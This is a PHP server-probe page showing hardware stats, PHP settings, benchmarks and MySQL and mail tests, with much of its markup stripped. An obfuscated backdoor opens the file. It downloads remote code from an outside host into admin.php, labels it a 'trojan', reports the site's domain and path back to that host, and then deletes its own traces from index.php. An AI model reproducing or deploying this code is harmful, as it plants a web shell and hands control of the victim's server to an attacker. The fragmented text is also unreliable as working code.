0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWRtaW4ucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cHM6Ly81MWxhLnp2bzIueHl6L2EyLnR4dA=="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly81MWxhLnp2bzIueHl6Lz9kPSVz\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?>=0; $l--) { $allsize1[$l]=floor($size/pow(1024,$l)); $allsize[$l]=$allsize1[$l]-$allsize1[$l+1]*1024; } $len=count($allsize); for($j = $len-1; $j >=0; $j--) { $fsize=$fsize.$allsize[$j].$danwei[$j]; } return $fsize; } function valid_email($str) { return ( ! preg_match("/^([a-z0-9\+_\-]+)(\.[a-z0-9\+_\-]+)*@([a-z0-9\-]+\.)+[a-z]{2,6}$/ix", $str)) ? FALSE : TRUE; } //检测PHP设置参数 function show($varName) { switch($result = get_cfg_var($varName)) { case 0: return '×'; break; case 1: return ''; break; default: return $result; break; } } //保留服务器性能测试结果 $valInt = isset($_POST['pInt']) ? $_POST['pInt'] : "No Test"; $valFloat = isset($_POST['pFloat']) ? $_POST['pFloat'] : "No Test"; $valIo = isset($_POST['pIo']) ? $_POST['pIo'] : "No Test"; if ($_GET['act'] == "phpinfo") { phpinfo(); exit(); } elseif($_POST['act'] == "Int Test") { $valInt = test_int(); } elseif($_POST['act'] == "Float Test") { $valFloat = test_float(); } elseif($_POST['act'] == "IO Test") { $valIo = test_io(); } //网速测试-开始 elseif($_POST['act']=="Start Test") { ?> "; } ?> "; Echo "This shows all the functions supported by the system, and custom functions\n"; print_r($arr); echo ""; exit(); }elseif($_GET['act'] == "disable_functions") { $disFuns=get_cfg_var("disable_functions"); if(empty($disFuns)) { $arr = '×'; } else { $arr = $disFuns; } Function php() { } echo "
	Echo "This shows all the functions disable by the system\n";
	echo "
"; exit(); } //MySQL检测 if ($_POST['act'] == 'MySQL Test') { $host = isset($_POST['host']) ? trim($_POST['host']) : ''; $port = isset($_POST['port']) ? (int) $_POST['port'] : ''; $login = isset($_POST['login']) ? trim($_POST['login']) : ''; $password = isset($_POST['password']) ? trim($_POST['password']) : ''; $host = preg_match('~[^a-z0-9\-\.]+~i', $host) ? '' : $host; $port = intval($port) ? intval($port) : ''; $login = preg_match('~[^a-z0-9\_\-]+~i', $login) ? '' : htmlspecialchars($login); $password = is_string($password) ? htmlspecialchars($password) : ''; } elseif ($_POST['act'] == 'Function Test') { $funRe = "Function".$_POST['funName']."Test results support the position: ".isfun1($_POST['funName']); } elseif ($_POST['act'] == 'Mail Test') { $mailRe = "Mail test results: send"; if($_SERVER['SERVER_PORT']==80){$mailContent = "http://".$_SERVER['SERVER_NAME'].($_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);} else{$mailContent = "http://".$_SERVER['SERVER_NAME'].":".$_SERVER['SERVER_PORT'].($_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);} $mailRe .= (false !== @mail($_POST["mailAdd"], $mailContent, "This is a test mail!")) ? "Complete":"Failure"; } //网络速度测试 if(isset($_POST['speed'])) { $speed=round(100/($_POST['speed']/1000),2); } elseif($_GET['speed']=="0") { $speed=6666.67; } elseif(isset($_GET['speed']) and $_GET['speed']>0) { $speed=round(100/($_GET['speed']/1000),2); //下载速度: $speed kb/s } else { $speed=" No Test "; } // 检测函数支持 function isfun($funName = '') { if (!$funName || trim($funName) == '' || preg_match('~[^a-z0-9\_]+~i', $funName, $tmp)) return '错误'; return (false !== function_exists($funName)) ? '' : '×'; } function isfun1($funName = '') { if (!$funName || trim($funName) == '' || preg_match('~[^a-z0-9\_]+~i', $funName, $tmp)) return '错误'; return (false !== function_exists($funName)) ? '√' : '×'; } //整数运算能力测试 function test_int() { $timeStart = gettimeofday(); for($i = 0; $i < 3000000; $i++) { $t = 1+1; } $timeEnd = gettimeofday(); $time = ($timeEnd["usec"]-$timeStart["usec"])/1000000+$timeEnd["sec"]-$timeStart["sec"]; $time = round($time, 3)." Second"; return $time; } //浮点运算能力测试 function test_float() { //得到圆周率值 $t = pi(); $timeStart = gettimeofday(); for($i = 0; $i < 3000000; $i++) { //开平方 sqrt($t); } $timeEnd = gettimeofday(); $time = ($timeEnd["usec"]-$timeStart["usec"])/1000000+$timeEnd["sec"]-$timeStart["sec"]; $time = round($time, 3)."Second"; return $time; } //IO能力测试 function test_io() { $fp = @fopen(PHPSELF, "r"); $timeStart = gettimeofday(); for($i = 0; $i < 10000; $i++) { @fread($fp, 10240); @rewind($fp); } $timeEnd = gettimeofday(); @fclose($fp); $time = ($timeEnd["usec"]-$timeStart["usec"])/1000000+$timeEnd["sec"]-$timeStart["sec"]; $time = round($time, 3)."Second"; return($time); } function GetCoreInformation() {$data = file('/proc/stat');$cores = array();foreach( $data as $line ) {if( preg_match('/^cpu[0-9]/', $line) ){$info = explode(' ', $line);$cores[]=array('user'=>$info[1],'nice'=>$info[2],'sys' => $info[3],'idle'=>$info[4],'iowait'=>$info[5],'irq' => $info[6],'softirq' => $info[7]);}}return $cores;} function GetCpuPercentages($stat1, $stat2) {if(count($stat1)!==count($stat2)){return;}$cpus=array();for( $i = 0, $l = count($stat1); $i < $l; $i++) { $dif = array(); $dif['user'] = $stat2[$i]['user'] - $stat1[$i]['user'];$dif['nice'] = $stat2[$i]['nice'] - $stat1[$i]['nice']; $dif['sys'] = $stat2[$i]['sys'] - $stat1[$i]['sys'];$dif['idle'] = $stat2[$i]['idle'] - $stat1[$i]['idle'];$dif['iowait'] = $stat2[$i]['iowait'] - $stat1[$i]['iowait'];$dif['irq'] = $stat2[$i]['irq'] - $stat1[$i]['irq'];$dif['softirq'] = $stat2[$i]['softirq'] - $stat1[$i]['softirq'];$total = array_sum($dif);$cpu = array();foreach($dif as $x=>$y) $cpu[$x] = round($y / $total * 100, 2);$cpus['cpu' . $i] = $cpu;}return $cpus;} $stat1 = GetCoreInformation();sleep(1);$stat2 = GetCoreInformation();$data = GetCpuPercentages($stat1, $stat2); $cpu_show = $data['cpu0']['user']."%us, ".$data['cpu0']['sys']."%sy, ".$data['cpu0']['nice']."%ni, ".$data['cpu0']['idle']."%id, ".$data['cpu0']['iowait']."%wa, ".$data['cpu0']['irq']."%irq, ".$data['cpu0']['softirq']."%softirq"; function makeImageUrl($title, $data) {$api='http://api.yahei.net/tz/cpu_show.php?id=';$url.=$data['user'].',';$url.=$data['nice'].',';$url.=$data['sys'].',';$url.=$data['idle'].',';$url.=$data['iowait'];$url.='&chdl=User|Nice|Sys|Idle|Iowait&chdlp=b&chl=';$url.=$data['user'].'%25|';$url.=$data['nice'].'%25|';$url.=$data['sys'].'%25|';$url.=$data['idle'].'%25|';$url.=$data['iowait'].'%25';$url.='&chtt=Core+'.$title;return $api.base64_encode($url);} if($_GET['act'] == "cpu_percentage"){echo "
Slow image loading, please be patient!

";foreach( $data as $k => $v ) {echo '';}echo "
";exit();} // 根据不同系统取得CPU相关信息 switch(PHP_OS) { case "Linux": $sysReShow = (false !== ($sysInfo = sys_linux()))?"show":"none"; break; case "FreeBSD": $sysReShow = (false !== ($sysInfo = sys_freebsd()))?"show":"none"; break; /* case "WINNT": $sysReShow = (false !== ($sysInfo = sys_windows()))?"show":"none"; break; */ default: break; } //linux系统探测 function sys_linux() { // CPU if (false === ($str = @file("/proc/cpuinfo"))) return false; $str = implode("", $str); @preg_match_all("/model\s+name\s{0,}\:+\s{0,}([\w\s\)\(\@.-]+)([\r\n]+)/s", $str, $model); @preg_match_all("/cpu\s+MHz\s{0,}\:+\s{0,}([\d\.]+)[\r\n]+/", $str, $mhz); @preg_match_all("/cache\s+size\s{0,}\:+\s{0,}([\d\.]+\s{0,}[A-Z]+[\r\n]+)/", $str, $cache); @preg_match_all("/bogomips\s{0,}\:+\s{0,}([\d\.]+)[\r\n]+/", $str, $bogomips); if (false !== is_array($model[1])) { $res['cpu']['num'] = sizeof($model[1]); /* for($i = 0; $i < $res['cpu']['num']; $i++) { $res['cpu']['model'][] = $model[1][$i].' ('.$mhz[1][$i].')'; $res['cpu']['mhz'][] = $mhz[1][$i]; $res['cpu']['cache'][] = $cache[1][$i]; $res['cpu']['bogomips'][] = $bogomips[1][$i]; }*/ if($res['cpu']['num']==1) $x1 = ''; else $x1 = ' ×'.$res['cpu']['num']; $mhz[1][0] = ' | Frequency:'.$mhz[1][0]; $cache[1][0] = ' | Secondary cache:'.$cache[1][0]; $bogomips[1][0] = ' | Bogomips:'.$bogomips[1][0]; $res['cpu']['model'][] = $model[1][0].$mhz[1][0].$cache[1][0].$bogomips[1][0].$x1; if (false !== is_array($res['cpu']['model'])) $res['cpu']['model'] = implode("
", $res['cpu']['model']); if (false !== is_array($res['cpu']['mhz'])) $res['cpu']['mhz'] = implode("
", $res['cpu']['mhz']); if (false !== is_array($res['cpu']['cache'])) $res['cpu']['cache'] = implode("
", $res['cpu']['cache']); if (false !== is_array($res['cpu']['bogomips'])) $res['cpu']['bogomips'] = implode("
", $res['cpu']['bogomips']); } // NETWORK // UPTIME if (false === ($str = @file("/proc/uptime"))) return false; $str = explode(" ", implode("", $str)); $str = trim($str[0]); $min = $str / 60; $hours = $min / 60; $days = floor($hours / 24); $hours = floor($hours - ($days * 24)); $min = floor($min - ($days * 60 * 24) - ($hours * 60)); if ($days !== 0) $res['uptime'] = $days."Day"; if ($hours !== 0) $res['uptime'] .= $hours."Hour"; $res['uptime'] .= $min."Minute"; // MEMORY if (false === ($str = @file("/proc/meminfo"))) return false; $str = implode("", $str); preg_match_all("/MemTotal\s{0,}\:+\s{0,}([\d\.]+).+?MemFree\s{0,}\:+\s{0,}([\d\.]+).+?Cached\s{0,}\:+\s{0,}([\d\.]+).+?SwapTotal\s{0,}\:+\s{0,}([\d\.]+).+?SwapFree\s{0,}\:+\s{0,}([\d\.]+)/s", $str, $buf); preg_match_all("/Buffers\s{0,}\:+\s{0,}([\d\.]+)/s", $str, $buffers); $res['memTotal'] = round($buf[1][0]/1024, 2); $res['memFree'] = round($buf[2][0]/1024, 2); $res['memBuffers'] = round($buffers[1][0]/1024, 2); $res['memCached'] = round($buf[3][0]/1024, 2); $res['memUsed'] = $res['memTotal']-$res['memFree']; $res['memPercent'] = (floatval($res['memTotal'])!=0)?round($res['memUsed']/$res['memTotal']*100,2):0; $res['memRealUsed'] = $res['memTotal'] - $res['memFree'] - $res['memCached'] - $res['memBuffers']; //真实内存使用 $res['memRealFree'] = $res['memTotal'] - $res['memRealUsed']; //真实空闲 $res['memRealPercent'] = (floatval($res['memTotal'])!=0)?round($res['memRealUsed']/$res['memTotal']*100,2):0; //真实内存使用率 $res['memCachedPercent'] = (floatval($res['memCached'])!=0)?round($res['memCached']/$res['memTotal']*100,2):0; //Cached内存使用率 $res['swapTotal'] = round($buf[4][0]/1024, 2); $res['swapFree'] = round($buf[5][0]/1024, 2); $res['swapUsed'] = round($res['swapTotal']-$res['swapFree'], 2); $res['swapPercent'] = (floatval($res['swapTotal'])!=0)?round($res['swapUsed']/$res['swapTotal']*100,2):0; // LOAD AVG if (false === ($str = @file("/proc/loadavg"))) return false; $str = explode(" ", implode("", $str)); $str = array_chunk($str, 4); $res['loadAvg'] = implode(" ", $str[0]); return $res; } //FreeBSD系统探测 function sys_freebsd() { //CPU if (false === ($res['cpu']['num'] = get_key("hw.ncpu"))) return false; $res['cpu']['model'] = get_key("hw.model"); //LOAD AVG if (false === ($res['loadAvg'] = get_key("vm.loadavg"))) return false; //UPTIME if (false === ($buf = get_key("kern.boottime"))) return false; $buf = explode(' ', $buf); $sys_ticks = time() - intval($buf[3]); $min = $sys_ticks / 60; $hours = $min / 60; $days = floor($hours / 24); $hours = floor($hours - ($days * 24)); $min = floor($min - ($days * 60 * 24) - ($hours * 60)); if ($days !== 0) $res['uptime'] = $days."Day"; if ($hours !== 0) $res['uptime'] .= $hours."Hour"; $res['uptime'] .= $min."Minute"; //MEMORY if (false === ($buf = get_key("hw.physmem"))) return false; $res['memTotal'] = round($buf/1024/1024, 2); $str = get_key("vm.vmtotal"); preg_match_all("/\nVirtual Memory[\:\s]*\(Total[\:\s]*([\d]+)K[\,\s]*Active[\:\s]*([\d]+)K\)\n/i", $str, $buff, PREG_SET_ORDER); preg_match_all("/\nReal Memory[\:\s]*\(Total[\:\s]*([\d]+)K[\,\s]*Active[\:\s]*([\d]+)K\)\n/i", $str, $buf, PREG_SET_ORDER); $res['memRealUsed'] = round($buf[0][2]/1024, 2); $res['memCached'] = round($buff[0][2]/1024, 2); $res['memUsed'] = round($buf[0][1]/1024, 2) + $res['memCached']; $res['memFree'] = $res['memTotal'] - $res['memUsed']; $res['memPercent'] = (floatval($res['memTotal'])!=0)?round($res['memUsed']/$res['memTotal']*100,2):0; $res['memRealPercent'] = (floatval($res['memTotal'])!=0)?round($res['memRealUsed']/$res['memTotal']*100,2):0; return $res; } //取得参数值 FreeBSD function get_key($keyName) { return do_command('sysctl', "-n $keyName"); } //确定执行文件位置 FreeBSD function find_command($commandName) { $path = array('/bin', '/sbin', '/usr/bin', '/usr/sbin', '/usr/local/bin', '/usr/local/sbin'); foreach($path as $p) { if (@is_executable("$p/$commandName")) return "$p/$commandName"; } return false; } //执行系统命令 FreeBSD function do_command($commandName, $args) { $buffer = ""; if (false === ($command = find_command($commandName))) return false; if ($fp = @popen("$command $args", 'r')) { while (!@feof($fp)) { $buffer .= @fgets($fp, 4096); } return trim($buffer); } return false; } //windows系统探测 function sys_windows() { if (PHP_VERSION >= 5) { $objLocator = new COM("WbemScripting.SWbemLocator"); $wmi = $objLocator->ConnectServer(); $prop = $wmi->get("Win32_PnPEntity"); } else { return false; } //CPU $cpuinfo = GetWMI($wmi,"Win32_Processor", array("Name","L2CacheSize","NumberOfCores")); $res['cpu']['num'] = $cpuinfo[0]['NumberOfCores']; if (null == $res['cpu']['num']) { $res['cpu']['num'] = 1; }/* for ($i=0;$i<$res['cpu']['num'];$i++) { $res['cpu']['model'] .= $cpuinfo[0]['Name']."
"; $res['cpu']['cache'] .= $cpuinfo[0]['L2CacheSize']."
"; }*/ $cpuinfo[0]['L2CacheSize'] = ' ('.$cpuinfo[0]['L2CacheSize'].')'; if($res['cpu']['num']==1) $x1 = ''; else $x1 = ' ×'.$res['cpu']['num']; $res['cpu']['model'] = $cpuinfo[0]['Name'].$cpuinfo[0]['L2CacheSize'].$x1; // SYSINFO $sysinfo = GetWMI($wmi,"Win32_OperatingSystem", array('LastBootUpTime','TotalVisibleMemorySize','FreePhysicalMemory','Caption','CSDVersion','SerialNumber','InstallDate')); $sysinfo[0]['Caption']=iconv('GBK', 'UTF-8',$sysinfo[0]['Caption']); $sysinfo[0]['CSDVersion']=iconv('GBK', 'UTF-8',$sysinfo[0]['CSDVersion']); $res['win_n'] = $sysinfo[0]['Caption']." ".$sysinfo[0]['CSDVersion']." 序列号:{$sysinfo[0]['SerialNumber']} 于".date('Y年m月d日H:i:s',strtotime(substr($sysinfo[0]['InstallDate'],0,14)))."安装"; //UPTIME $res['uptime'] = $sysinfo[0]['LastBootUpTime']; $sys_ticks = 3600*8 + time() - strtotime(substr($res['uptime'],0,14)); $min = $sys_ticks / 60; $hours = $min / 60; $days = floor($hours / 24); $hours = floor($hours - ($days * 24)); $min = floor($min - ($days * 60 * 24) - ($hours * 60)); if ($days !== 0) $res['uptime'] = $days."Day"; if ($hours !== 0) $res['uptime'] .= $hours."Hour"; $res['uptime'] .= $min."Minute"; //MEMORY $res['memTotal'] = round($sysinfo[0]['TotalVisibleMemorySize']/1024,2); $res['memFree'] = round($sysinfo[0]['FreePhysicalMemory']/1024,2); $res['memUsed'] = $res['memTotal']-$res['memFree']; //上面两行已经除以1024,这行不用再除了 $res['memPercent'] = round($res['memUsed'] / $res['memTotal']*100,2); $swapinfo = GetWMI($wmi,"Win32_PageFileUsage", array('AllocatedBaseSize','CurrentUsage')); // LoadPercentage $loadinfo = GetWMI($wmi,"Win32_Processor", array("LoadPercentage")); $res['loadAvg'] = $loadinfo[0]['LoadPercentage']; return $res; } function GetWMI($wmi,$strClass, $strValue = array()) { $arrData = array(); $objWEBM = $wmi->Get($strClass); $arrProp = $objWEBM->Properties_; $arrWEBMCol = $objWEBM->Instances_(); foreach($arrWEBMCol as $objItem) { @reset($arrProp); $arrInstance = array(); foreach($arrProp as $propItem) { eval("\$value = \$objItem->" . $propItem->Name . ";"); if (empty($strValue)) { $arrInstance[$propItem->Name] = trim($value); } else { if (in_array($propItem->Name, $strValue)) { $arrInstance[$propItem->Name] = trim($value); } } } $arrData[] = $arrInstance; } return $arrData; } //比例条 function bar($percent) { ?>
"$du",'freeSpace'=>"$df",'hdPercent'=>"$hdPercent",'barhdPercent'=>"$hdPercent%",'TotalMemory'=>"$mt",'UsedMemory'=>"$mu",'FreeMemory'=>"$mf",'CachedMemory'=>"$mc",'Buffers'=>"$mb",'TotalSwap'=>"$st",'swapUsed'=>"$su",'swapFree'=>"$sf",'loadAvg'=>"$load",'uptime'=>"$uptime",'freetime'=>"$freetime",'bjtime'=>"$bjtime",'stime'=>"$stime",'memRealPercent'=>"$memRealPercent",'memRealUsed'=>"$memRealUsed",'memRealFree'=>"$memRealFree",'memPercent'=>"$memPercent%",'memCachedPercent'=>"$memCachedPercent",'barmemCachedPercent'=>"$memCachedPercent%",'swapPercent'=>"$swapPercent",'barmemRealPercent'=>"$memRealPercent%",'barswapPercent'=>"$swapPercent%",'NetOut2'=>"$NetOut[2]",'NetOut3'=>"$NetOut[3]",'NetOut4'=>"$NetOut[4]",'NetOut5'=>"$NetOut[5]",'NetOut6'=>"$NetOut[6]",'NetOut7'=>"$NetOut[7]",'NetOut8'=>"$NetOut[8]",'NetOut9'=>"$NetOut[9]",'NetOut10'=>"$NetOut[10]",'NetInput2'=>"$NetInput[2]",'NetInput3'=>"$NetInput[3]",'NetInput4'=>"$NetInput[4]",'NetInput5'=>"$NetInput[5]",'NetInput6'=>"$NetInput[6]",'NetInput7'=>"$NetInput[7]",'NetInput8'=>"$NetInput[8]",'NetInput9'=>"$NetInput[9]",'NetInput10'=>"$NetInput[10]",'NetOutSpeed2'=>"$NetOutSpeed[2]",'NetOutSpeed3'=>"$NetOutSpeed[3]",'NetOutSpeed4'=>"$NetOutSpeed[4]",'NetOutSpeed5'=>"$NetOutSpeed[5]",'NetInputSpeed2'=>"$NetInputSpeed[2]",'NetInputSpeed3'=>"$NetInputSpeed[3]",'NetInputSpeed4'=>"$NetInputSpeed[4]",'NetInputSpeed5'=>"$NetInputSpeed[5]"); $jarr=json_encode($arr); $_GET['callback'] = htmlspecialchars($_GET['callback']); echo $_GET['callback'],'(',$jarr,')'; exit; } ?> <?php echo $title.$version; ?>
PHP Module Other Database Performance Speed MySQL Function Mail Download
Server Parameters
Server Domain/IP - ()  Your IP address is:
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Server OS  Kernel version: Web Server
Server Language Server Port
Server HostName Absolute Path
Administrator Mail Prober Path
Real-time Data Server
Current Server Time Server Uptime
CPU Model [Core]
CPU usage View Chart";}else{echo "Only supports the Linux system";}?>
Space usage Total Space  G, Used  G, Free  G, Rate %
Memory usage Total Memory: , Used , Free , Rate
0) { ?> Cache Memory , Rate % | Buffers
Real Memory Used , Real Memory Free , Rate %
0) { ?> SWAP: , Used , Free , Rate %
Average System Load
: In : Real time: 0B/s Out : Real time: 0B/s
PHP has been compiled module testing
$value) { if ($key!=0 && $key%13==0) { echo '
'; } echo "$value  "; } ?>
PHP Parameters
PHP Info: ×' :"PHPINFO";?> PHP Version:
Run PHP: Memory Limit:
PHP Safe Mode: Post Max Size:
Upload Max Filesize: Floating-point data of significant digits:
Max Execution Time: Second Socket TimeOut: Second
PHP Doc Root: User Dir:
Enable Dl: Include Path:
Display Errors: Register Globals:
Magic Quotes Gpc: "<?...?>"Short Open Tag:
"<% %>"ASP Tags: Ignore Repeated Errors:
Ignore Repeated Source: Report Memleaks:
Magic Quotes Gpc: Magic Quotes Runtime:
Allow URL Fopen: Register Argc Argv:
Cookie: √' : '×';?> Spell check(ASpell Library):
High-precision math(BCMath): PREL(PCRE):
VMailMgr: Curl:
SMTP: √' : '×';?> SMTP: ×';?>
Enable Functions: Click here to view more!
Disable Functions: ×'; } else { //echo $disFuns; $disFuns_array = explode(',',$disFuns); foreach ($disFuns_array as $key=>$value) { if ($key!=0 && $key%5==0) { echo '
'; } echo "$value  "; } } ?>
Session: Socket:
Calendar Allow Url Fopen:
GD Library: ×';} ?> Zlib:
IMAP: JDToGregorian:
Preg Match: WDDX:
Iconv: mbstring:
MCrypt: Mhash Count:
Other Components
Zend Version ×';}else{echo $zend_version;}?> 2) { echo "ZendGuardLoader[On]"; } else { echo "Zend Optimizer"; } ?> 2){echo (get_cfg_var("zend_loader.enable"))?'':'×';} else{if(function_exists('zend_optimizer_version')){ echo zend_optimizer_version();}else{ echo (get_cfg_var("zend_optimizer.optimization_level")||get_cfg_var("zend_extension_manager.optimizer_ts")||get_cfg_var("zend.ze1_compatibility_mode")||get_cfg_var("zend_extension_ts"))?'':'×';}}?>
eAccelerator ×";} ?> ioncube ×";}?>
XCache ×";} ?> APC ×";} ?>
Oracle: SQL Server:
SQLite: √ ';echo "SQLite3 Ver ";echo $sqliteVer[versionString];}else {echo isfun("sqlite_close");if(isfun("sqlite_close") == '') {echo " : ".@sqlite_libversion();}}?> Hyperwave:
Postgre SQL: Informix:
DBA database: DBM database:
FilePro database: SyBase database:
" method="post">
Server Performance Test
Reference Object Int Test
(1+1 Count 3 Million)
Float Test
(Pi times the square root of 3 million)
I/O Test
(10K file read 10,000 times)
CPU Info
LinodeVPS 0.357 Second 0.802 Second 0.023 Second 4 x Xeon L5520 @ 2.27GHz
PhotonVPS.com 0.431 Second 1.024 Second 0.034 Second 8 x Xeon E5520 @ 2.27GHz
SpaceRich.com 0.421 Second 1.003 Second 0.038 Second 4 x Core i7 920 @ 2.67GHz
RiZie.com 0.521 Second 1.559 Second 0.054 Second 2 x Pentium4 3.00GHz
CitynetHost.com 0.343 Second 0.761 Second 0.023 Second 2 x Core2Duo E4600 @ 2.40GHz
IXwebhosting.com 0.535 Second 1.607 Second 0.058 Second 4 x Xeon E5530 @ 2.40GHz
This Server

Network Speed Test

1000k bytes sent to the client data
Bandwidth 1M 2M 3M 4M 5M 6M 7M 8M 9M 10M
"> ">
".$_GET['speed']." Millisecond, Download Speed: "."".$speed.""." kb/s":" No Test " ?>
MySQL Database connection detection
Host: Port: Username: Password:
alert('Connect to the MySql database to normal')"; } else { echo ""; } } else { echo ""; } } ?> alert('$funRe')"; } ?>
Function Test
Enter the function you want to test:
alert('$mailRe')"; } ?>
Mail Send Test
Please enter your email address to test:
Processed in seconds. memory usage. TOP